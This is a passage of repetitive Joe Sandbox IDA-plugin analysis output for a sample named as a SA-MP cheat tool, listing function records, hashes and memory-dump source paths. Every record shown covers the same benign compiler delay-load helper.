                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 82751d623ef7b3de96072fde4ca821fa1e8ae0d07b9d7d76d910ea381ece99b4
                                                    • Instruction ID: 9892a8ca48798aad4f8642e8d182f4f51aee1b6f69050aac945d62402e93168a
                                                    • Opcode Fuzzy Hash: 82751d623ef7b3de96072fde4ca821fa1e8ae0d07b9d7d76d910ea381ece99b4
                                                    • Instruction Fuzzy Hash: DBB012E666C700BC710451552C02D3B030CC0C1B11330CC3EFC29C08C0D850EC080472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 993c6dd2bd3e51e462e22deb112525fc32674eb99529d8c773a0b1c04f3b5089
                                                    • Instruction ID: 85bf9035f53304e6c1ce10c95e9e3156fa900761d0b0766d11c69eae147cb33a
                                                    • Opcode Fuzzy Hash: 993c6dd2bd3e51e462e22deb112525fc32674eb99529d8c773a0b1c04f3b5089
                                                    • Instruction Fuzzy Hash: F4B012E266D700AC710492152C02E3B030CC0C1B11330C83EFC1DC02C0D850EC0C0872
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: d6466870a4e1a93fce07360d59ff1e65f801a6c4e84aaea81141b4b122b60e08
                                                    • Instruction ID: 2a6b0f7c6783626e1cd219073f0cc3a43c25fbdd11910f9b67154d1be8964cfb
                                                    • Opcode Fuzzy Hash: d6466870a4e1a93fce07360d59ff1e65f801a6c4e84aaea81141b4b122b60e08
                                                    • Instruction Fuzzy Hash: 0FB012E666C700AC710491692C02E3B030CC0C0B11330883EFC2DC05C0D850EC080572
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0EAF9
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 87d66d4907e69c96ecc51e2706969811905441db77e9ce6eca8786b5b7455d2b
                                                    • Instruction ID: fcce24192272342cc15fa2802661eb4fa63e034f313d8a73159f54826db2cb65
                                                    • Opcode Fuzzy Hash: 87d66d4907e69c96ecc51e2706969811905441db77e9ce6eca8786b5b7455d2b
                                                    • Instruction Fuzzy Hash: 6FB012C73AB652BC750872452D06D3F430DC0D0BD2330D82EFC08C40E1DC804D090471
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 16d872897c9fd7037214f4be145951dca0057c39976ee4c934e6cb79b075bcdf
                                                    • Instruction ID: b9aa4667f6cacc3689624cc83bbb71c5548edf96f601d26ea49907b6bb27396a
                                                    • Opcode Fuzzy Hash: 16d872897c9fd7037214f4be145951dca0057c39976ee4c934e6cb79b075bcdf
                                                    • Instruction Fuzzy Hash: 45B012F266C600AC710491162D02E3B038CC0C0B11330883EFC1DC01C0DC50ED090472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 596fa7a734cc2c513a2d56fafcfc459990a81bf283b44a552b982f64c3f6f16d
                                                    • Instruction ID: 022eb26a3589d2c4ffd73055ef17dc67e672da9c69e27de0f5950b326aa3d0c5
                                                    • Opcode Fuzzy Hash: 596fa7a734cc2c513a2d56fafcfc459990a81bf283b44a552b982f64c3f6f16d
                                                    • Instruction Fuzzy Hash: 6AB012F266DB40BC714992152C02E3B030DC0C0B51330893EFC1DC01C0DC50EC4C0472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: c8dce98e9b0b3428001ba05c1c464b4d0b8961ebb240e3d6e5ee6b8829b57a70
                                                    • Instruction ID: d9b7f14fda2a88cf8916986003ff333a14328059f604804918ef5a1ea6486bbe
                                                    • Opcode Fuzzy Hash: c8dce98e9b0b3428001ba05c1c464b4d0b8961ebb240e3d6e5ee6b8829b57a70
                                                    • Instruction Fuzzy Hash: B6B012E266DA40AC710891152C02E3B030DC0C1B51330C83EFC1DC01C0D850EC080472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a6f671f56acd13e6c00b23df44a2263ab45afb2e2c789247c3252673a587923c
                                                    • Instruction ID: 337f18e4fc81487de3decc85228ef2fa5bf4cabe5d4881e5e64c84bc29bc37f4
                                                    • Opcode Fuzzy Hash: a6f671f56acd13e6c00b23df44a2263ab45afb2e2c789247c3252673a587923c
                                                    • Instruction Fuzzy Hash: C3B012E267DA40AC750891252C02E3B034DC4C0B51330883EFC1EC01C0D850EC080472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f0051b507c5a7230f49ed3519840c753f18eca43687cd12cc958b2c90d1b6058
                                                    • Instruction ID: cbe1b954172ce3f03a11f213232e4d9c67205c09e83a07013955f75f7d7d3a28
                                                    • Opcode Fuzzy Hash: f0051b507c5a7230f49ed3519840c753f18eca43687cd12cc958b2c90d1b6058
                                                    • Instruction Fuzzy Hash: 34B012E266C600AC710491262C02E3B034CC0C1B11330C83EFC1DC01C0D850EC080472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1de701c6e733a0b0830711df3429a4b12d95c47cef5f1e2a1d435b507a396899
                                                    • Instruction ID: 20f00aae2f239f02f92b3add9897aef19505e2240346d6171c3ef9595fc691e9
                                                    • Opcode Fuzzy Hash: 1de701c6e733a0b0830711df3429a4b12d95c47cef5f1e2a1d435b507a396899
                                                    • Instruction Fuzzy Hash: 9CB012F266C700BC710491152C02E3B030CC0C1F11330C83EFC1DC01C0D850ED080472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: deb19eb77ae29b628934d25b3ba04c4114284659e74a374427ad2b2966589d16
                                                    • Instruction ID: f24e05030718ad70f7767f59b36e2891c6c1949ab6f518457997a411eea56637
                                                    • Opcode Fuzzy Hash: deb19eb77ae29b628934d25b3ba04c4114284659e74a374427ad2b2966589d16
                                                    • Instruction Fuzzy Hash: F7B092A266C740AC614592152802E3A020CC0C0B11320892ABC1DC02C09850AC480872
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 96e2c060502aefba5a29d1bd823060c0181fb7ec0b30a72fbe0c35a3b3b8f128
                                                    • Instruction ID: a3154f1b3a1dc952a783fb1dae998a637392a22ec64b2eec73ecde2022c36566
                                                    • Opcode Fuzzy Hash: 96e2c060502aefba5a29d1bd823060c0181fb7ec0b30a72fbe0c35a3b3b8f128
                                                    • Instruction Fuzzy Hash: A8B012E266C700AC710492152D02E3B030CC0C0B11330C83EFC1DC02C0DC60ED0D0872
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 87586e12fd7f30c1722d37c004f46c9818eed5915e035455b5b43479efc376ca
                                                    • Instruction ID: 46c2b590b0b1c785753ae0e9133f501f8ea1b482144be27f7cee80925a56a4cb
                                                    • Opcode Fuzzy Hash: 87586e12fd7f30c1722d37c004f46c9818eed5915e035455b5b43479efc376ca
                                                    • Instruction Fuzzy Hash: 70B012F266C600AC710491152D02E3B030CC0C0F11330883EFC1DC01C0EC50EE090472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 00b2e2423c4521569b3b29be6357185192299ff7195252bef03173df88ffaba2
                                                    • Instruction ID: 18fe19eb70a5e68ba97e0a98b2565ee3d47d57371500fe64c3986e2057f55ea2
                                                    • Opcode Fuzzy Hash: 00b2e2423c4521569b3b29be6357185192299ff7195252bef03173df88ffaba2
                                                    • Instruction Fuzzy Hash: 67B012F266C600AC710491262C02E3B030CC0C0F11330883EFC1DC01C0D850ED080472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 25aa66f2079415e8498a8ee323c79040fd589ac7eb84c8040ba3dc543b7ffcfb
                                                    • Instruction ID: 4c9bffbca6093eee3adc887b33b20f81e480295ed3a3be75a8df2cff4e5dca25
                                                    • Opcode Fuzzy Hash: 25aa66f2079415e8498a8ee323c79040fd589ac7eb84c8040ba3dc543b7ffcfb
                                                    • Instruction Fuzzy Hash: F2B012F266C700BC714591152C02E3B030CC0C0F11330893EFC1DC01C0DC50ED480472
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1bd98b10a603db7c37e66a64456aae5fd030bbd774e5998e60149613414a4e22
                                                    • Instruction ID: a4c3c173e47f94d29197120a11be5e6ee2601c2a102c177021b5b7cf9c05d651
                                                    • Opcode Fuzzy Hash: 1bd98b10a603db7c37e66a64456aae5fd030bbd774e5998e60149613414a4e22
                                                    • Instruction Fuzzy Hash: 2DB012E2269210BC710491092C02E3B030DC0C1B23330D82EFC1CC11C0D8408C0C0473
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 29935ae23e251949aa10768c4d1fbd0fb340d31bf576f09a71059573483c3b19
                                                    • Instruction ID: 1eed0b7c4ab774b532a4575689865d63bc199c804d4e16fd72b842a50e1b74e3
                                                    • Opcode Fuzzy Hash: 29935ae23e251949aa10768c4d1fbd0fb340d31bf576f09a71059573483c3b19
                                                    • Instruction Fuzzy Hash: AAB012E22682107C714451092D02E3B430DC0C1B13330D82EFD1CC11C0D8404C0D0473
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
